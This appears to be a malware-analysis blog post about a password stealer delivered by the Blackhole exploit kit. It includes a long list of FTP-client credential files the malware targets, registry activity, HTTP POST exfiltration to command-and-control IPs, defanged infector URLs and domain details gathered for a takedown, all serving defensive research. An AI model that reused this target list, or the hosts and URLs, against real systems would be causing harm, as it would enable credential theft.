.text:0041C984 00000626 C ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8
.text:00425BDC 00000477 C 8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho
What kind of data has been stolen??
What this file did was shocky, it was trying to open/load autoexec & every internet account
related software's configuration file as per detected in the below list:
c:\autoexec.bat [Open File Attempt Detected]
C:\DOCUME~1\~1\LOCALS~1\Temp\HWID [Open File Attempt Detected]
C:\WINDOWS\wcx_ftp.ini [Open File Attempt Detected]
C:\Documents and Settings\\wcx_ftp.ini [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\GHISLER\wcx_ftp.ini [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\GHISLER\wcx_ftp.ini [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\GHISLER\wcx_ftp.ini [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\GlobalSCAPE\CuteFTP\sm.dat [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\GlobalSCAPE\CuteFTP Pro\sm.dat [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\GlobalSCAPE\CuteFTP Lite\sm.dat [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\CuteFTP\sm.dat [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP\sm.dat [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP Pro\sm.dat [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP Lite\sm.dat [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\CuteFTP\sm.dat [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\GlobalSCAPE\CuteFTP\sm.dat [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\GlobalSCAPE\CuteFTP Pro\sm.dat [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\GlobalSCAPE\CuteFTP Lite\sm.dat [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\CuteFTP\sm.dat [Open File Attempt Detected]
C:\Program Files\GlobalSCAPE\CuteFTP\sm.dat [Open File Attempt Detected]
C:\Program Files\GlobalSCAPE\CuteFTP Pro\sm.dat [Open File Attempt Detected]
C:\Program Files\GlobalSCAPE\CuteFTP Lite\sm.dat [Open File Attempt Detected]
C:\Program Files\CuteFTP\sm.dat [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\FlashFXP\3\Sites.dat [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\FlashFXP\4\Sites.dat [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\FlashFXP\3\Quick.dat [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\FlashFXP\4\Quick.dat [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\FlashFXP\3\History.dat [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\FlashFXP\4\History.dat [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\FlashFXP\3\Sites.dat [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\FlashFXP\4\Sites.dat [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\FlashFXP\3\Quick.dat [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\FlashFXP\4\Quick.dat [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\FlashFXP\3\History.dat [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\FlashFXP\4\History.dat [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\FlashFXP\3\Sites.dat [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\FlashFXP\4\Sites.dat [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\FlashFXP\3\Quick.dat [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\FlashFXP\4\Quick.dat [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\FlashFXP\3\History.dat [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\FlashFXP\4\History.dat [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\FileZilla\sitemanager.xml [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\FileZilla\recentservers.xml [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\FileZilla\filezilla.xml [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\FileZilla\sitemanager.xml [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\FileZilla\recentservers.xml [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\FileZilla\filezilla.xml [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\FileZilla\sitemanager.xml [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\FileZilla\recentservers.xml [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\FileZilla\filezilla.xml [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\ExpanDrive\drives.js [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\ExpanDrive\drives.js [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\ExpanDrive\drives.js [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\SharedSettings.ccs [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\SharedSettings.sqlite [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\SharedSettings_1_0_5.ccs [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\SharedSettings_1_0_5.sqlite [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\SharedSettings.ccs [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\SharedSettings.sqlite [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\SharedSettings_1_0_5.ccs [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\SharedSettings_1_0_5.sqlite [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\SharedSettings.ccs [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\SharedSettings.sqlite [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\SharedSettings_1_0_5.ccs [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\SharedSettings_1_0_5.sqlite [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\CoffeeCup Software\SharedSettings.ccs [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\CoffeeCup Software\SharedSettings.sqlite [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\CoffeeCup Software\SharedSettings_1_0_5.ccs [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\CoffeeCup Software\SharedSettings_1_0_5.sqlite [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\CoffeeCup Software\SharedSettings.ccs [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\CoffeeCup Software\SharedSettings.sqlite [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\CoffeeCup Software\SharedSettings_1_0_5.ccs [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\CoffeeCup Software\SharedSettings_1_0_5.sqlite [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\CoffeeCup Software\SharedSettings.ccs [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\CoffeeCup Software\SharedSettings.sqlite [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\CoffeeCup Software\SharedSettings_1_0_5.ccs [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\CoffeeCup Software\SharedSettings_1_0_5.sqlite [Open File Attempt Detected]
C:\WINDOWS\32BitFtp.ini [Open File Attempt Detected]
C:\DOCUME~1\~1\LOCALS~1\Temp\Client Hash [Open File Attempt Detected]
Well, this explains how credentials got stolen....
all version autoexec.bat/ famous FTP softwares, FileZilla, FlashFXP + etc credential
was grabbed...
Registry Activity
These are the registry data read:
Key: [ HKLM\SOFTWARE\Microsoft\CTF\SystemShared\ ],
Value Name: [ CUAS ], Value: [ 0 ], 1 time
Key: [ HKLM\SYSTEM\CurrentControlSet\Control\Session Manager ],
Value Name: [ CriticalSectionTimeout ], Value: [ 2592000 ], 1 time
Key: [ HKLM\SYSTEM\Setup ],
Value Name: [ SystemSetupInProgress ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers ],
Value Name: [ TransparentEnabled ], Value: [ 1 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Control\Terminal Server ],
Value Name: [ TSUserEnabled ], Value: [ 0 ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Keyboard Layout\Toggle ],
Value Name: [ Language Hotkey ], Value: [ 1 ], 2 times
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Keyboard Layout\Toggle ],
Value Name: [ Layout Hotkey ], Value: [ 2 ], 2 times
While, it added the below keys:
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\WinRAR, and
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Personal
with putting the below values:
HWID: 7B 38 38 45 38 35 31 37 37 2D 42 44 38 38 2D 34 33 45 34 2D 39 32 32 33 2D 39 39 45 43 38 34 42 31 33 38 34 42 7D , and -
C:\Documents and Settings\\My Documents
The malware also read & took your IE data as -
per traced in below's mutex:
//Read IE internet history...
0x4ac c:!documents and settings!user!cookies!
0x4ac c:!documents and settings!user!local settings!history!history.ie5!
0x4ac c:!documents and settings!user!local settings!temporary internet files!content.ie5!
The malware also opened the backdoor w/below service:
Bind to Host: localhost
ServiceName: SERVICES_ACTIVE_DATABASE
Port: (MACHINE_DNS_SERVER) TCP/53 (DNS)
Network Activity
How the taken data sent can be described in the section.
1. Sent data to remote host via HTTP/1.1 POST to below HOST:PORT
180.235.150.72:8080
203.113.98.131:80
173.224.221.135:8080
206.176.226.157:8080
2. While other connection establishment attempts also detected to IP:
132.248.49.112
113.130.65.77
The complete recorded comm.data is in the PCAP data,
the summary of above connection can be seen here -->>[HERE]
↑we can assume the CnC of this operation are at those IP lists.
3. The Password Stealer exp2.tmp.exe was downloaded from these hosts.
Below is the capture..
Are we suppose to laugh??
These moronz are making a sick joke by putting many strings of "HO HO HO.."
Let's just shutdown all of the service/IP/Domain related to this infection -
and let's see who will laugh "HO HO HO" in the end (facepalm)
To fellow "Good Guys" / Researchers
The malware sanple can be downloaded here --->>[CLICK]
PCAP & RegShot can be downloaded here --->>[CLICK]
ThreatExpert reference exists (not so details though..)--->>[CLICK]
Below is the infector and the long BHEK2's cracked url list:
-------------------------------------------------------
INFECTOR BHEK2 LOONG URL :-)
-------------------------------------------------------
payload: h00p://pelamutrika[.]ru:8080/forum/links/column.php?yf=30:1n:1i:1i:33&qe=2v:1k:1m:32:33:1k:1k:31:1j:1o&z=1k&lk=h&yf=i
field.swf: h00p://pelamutrika[.]ru:8080/forum/links/column.php?vmsxmw=30:1n:1i:1i:33&dpr=2w:3g:3d:36:3c&knusk=2v:1k:1m:32:33:1k:1k:31:1j:1o&vtsf=clq
score.swf: h00p://pelamutrika[.]ru:8080/forum/links/column.php?vmsxmw=30:1n:1i:1i:33&dpr=2w:3g:3d:36:3c&knusk=2v:1k:1m:32:33:1k:1k:31:1j:1o&vtsf=clq
infector1.pdf: h00p://pelamutrika[.]ru:8080/forum/links/column.php?qxwfe=30:1n:1i:1i:33&anaxw=38:3e:3h&kfcb=2v:1k:1m:32:33:1k:1k:31:1j:1o&zzsp=1k:1d:1f:1d:1g:1d:1f
infector2.pdf: h00p://pelamutrika[.]ru:8080/forum/links/column.php?zxztpaa=30:1n:1i:1i:33&evx=3e&sev=2v:1k:1m:32:33:1k:1k:31:1j:1o&uaauvo=1k:1d:1f:1d:1g:1d:1f
For the Shutdown Purpose
domain: PELAMUTRIKA.RU
nserver: ns1.pelamutrika.ru. 62.76.189.72
nserver: ns2.pelamutrika.ru. 41.168.5.140
nserver: ns3.pelamutrika.ru. 132.248.49.112
nserver: ns4.pelamutrika.ru. 209.51.221.247
nserver: ns5.pelamutrika.ru. 208.87.243.196
nserver: ns6.pelamutrika.ru. 216.99.149.226
pelamutrika.ru A 42.121.116.38
pelamutrika.ru A 202.180.221.186
pelamutrika.ru A 208.87.243.131
pelamutrika.ru A 212.162.52.180
pelamutrika.ru A 212.162.56.210
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private Person
registrar: NAUNET-REG-RIPN
admin-contact: https://client.naunet.ru/c/whoiscontact
created: 2012.11.25
paid-till: 2013.11.25
free-date: 2013.12.26
source: TCI
Last updated on 2012.12.09 19:06:53 MSK